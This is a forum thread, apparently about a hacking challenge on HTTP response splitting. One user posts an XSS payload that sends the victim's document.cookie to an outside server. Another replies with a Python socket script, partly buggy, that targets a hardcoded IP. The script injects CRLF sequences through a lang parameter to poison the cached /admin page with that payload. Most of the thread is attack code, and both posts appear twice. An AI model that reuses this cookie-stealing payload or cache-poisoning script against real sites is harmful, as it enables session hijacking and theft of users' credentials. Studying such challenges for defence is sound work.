Search
HZ Tracker
Latest topics
Who is online?
In total there are 4 users online :: 0 Registered, 0 Hidden and 4 Guests None
Most users ever online was 38 on Sun Mar 19, 2023 10:07 pm
Most Viewed Topics
Challenge HTTP Response Splitting
2 posters
Page 1 of 1
Challenge HTTP Response Splitting
by johnhacker Fri May 30, 2014 12:59 pm
Hi,
Can you help me to correct this code? I do not manage to validate the test of this challenge.
The variable xss has to contain:
Code:
xss = "<html><script>document.location=\"http://myserver.com/index.php?cookie=\"+document.cookie</script></html>"
code :
[You must be registered and logged in to see this link.]
challenge :
[You must be registered and logged in to see this link.]
Thank you!
Can you help me to correct this code? I do not manage to validate the test of this challenge.
The variable xss has to contain:
Code:
xss = "<html><script>document.location=\"http://myserver.com/index.php?cookie=\"+document.cookie</script></html>"
code :
[You must be registered and logged in to see this link.]
challenge :
[You must be registered and logged in to see this link.]
Thank you!
johnhacker- Noob
- Posts : 5
Join date : 2014-04-27
Re: Challenge HTTP Response Splitting
by kyle5647 Fri May 30, 2014 1:00 pm
ThePH30N1X: Your response is equal to "I don't know what I'm talking about but Google is your friend."
Both unproductive and showing how little you probably know about the subject.
This isn't high school. Here when we reply to people it is conducive to a productive environment.
Almost never will you see a legitimate user ask about something, only to see a response by another user who has been here a while, "Google it n00b."
Now back to the code itself:
You made several mistakes in the use of sockets, and in your syntax.
I won't give you the answer but I have done a bit to help you out.
Good luck.
Code: Python
#!/usr/bin/python
# coding: utf-8
import re, socket, sys, urllib
# create TCP stream
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error, msg:
print '[!]Failed to create socket. Error code: ' + str(msg[0])
sys.exit();
print '[+] Created TCP socket.'
def encode(data):
return re.sub("\n", "\r\n", data.lstrip())
try:
server = s.connect()
server.connect(("188.165.33.26", 58002))
session = []
except:
print '[!] Unable to resolve.'
print '[!] Closing SOCK_STREAM and exiting.'
s.close();
sys.exit();
# Empty the cache
data = """
GET /admin HTTP/1.1
Cache-Control: no-cache
Cookie: spip_session=%s
""" % (session)
server.send(encode(data))
print '[+] Clearing the cache.'
print server.recv(4096)
# Injection reponse
xss = "VOTRE XSS"
code = """
en
Content-Length: 0
HTTP/1.1 200 OK
Content-Length: %d
%s
""" % (len(xss), xss)
data = """
GET /user/param?lang=%s HTTP/1.1
Cookie: spip_session=%s
""" % (urllib.quote(encode(code)), session)
server.send(encode(data))
print '[+] XSS injected.'
print server.recv(4096)
# Changing the page cache /admin
data = """
GET /admin HTTP/1.1
Cookie: spip_session=%s
""" % (session)
server.send(encode(data))
print '[+] Affichage de la page modifiee'
# receive data from STREAMing socket
print server.recv(4096)
# Close socket.
# This is important.
print '[+] Successful injection.'
print '[!] Closing TCP stream.'
s.close()
Both unproductive and showing how little you probably know about the subject.
This isn't high school. Here when we reply to people it is conducive to a productive environment.
Almost never will you see a legitimate user ask about something, only to see a response by another user who has been here a while, "Google it n00b."
Now back to the code itself:
You made several mistakes in the use of sockets, and in your syntax.
I won't give you the answer but I have done a bit to help you out.
Good luck.
Code: Python
#!/usr/bin/python
# coding: utf-8
import re, socket, sys, urllib
# create TCP stream
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error, msg:
print '[!]Failed to create socket. Error code: ' + str(msg[0])
sys.exit();
print '[+] Created TCP socket.'
def encode(data):
return re.sub("\n", "\r\n", data.lstrip())
try:
server = s.connect()
server.connect(("188.165.33.26", 58002))
session = []
except:
print '[!] Unable to resolve.'
print '[!] Closing SOCK_STREAM and exiting.'
s.close();
sys.exit();
# Empty the cache
data = """
GET /admin HTTP/1.1
Cache-Control: no-cache
Cookie: spip_session=%s
""" % (session)
server.send(encode(data))
print '[+] Clearing the cache.'
print server.recv(4096)
# Injection reponse
xss = "VOTRE XSS"
code = """
en
Content-Length: 0
HTTP/1.1 200 OK
Content-Length: %d
%s
""" % (len(xss), xss)
data = """
GET /user/param?lang=%s HTTP/1.1
Cookie: spip_session=%s
""" % (urllib.quote(encode(code)), session)
server.send(encode(data))
print '[+] XSS injected.'
print server.recv(4096)
# Changing the page cache /admin
data = """
GET /admin HTTP/1.1
Cookie: spip_session=%s
""" % (session)
server.send(encode(data))
print '[+] Affichage de la page modifiee'
# receive data from STREAMing socket
print server.recv(4096)
# Close socket.
# This is important.
print '[+] Successful injection.'
print '[!] Closing TCP stream.'
s.close()
kyle5647- Member
- Posts : 40
Join date : 2014-04-08
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum
» SQL injection and Quote escaping
» [TUT] Chmod: Files & Permissions [TUT]
» Reaver pixiewps
» How To Crash Someone's Skype in 10 SECONDS
» Internet Security & IP Security (IPSec)
» [Python] Infinite / Definite File Generator
» [C#] String Case-Inversion
» Rekall Memory Forensic Framework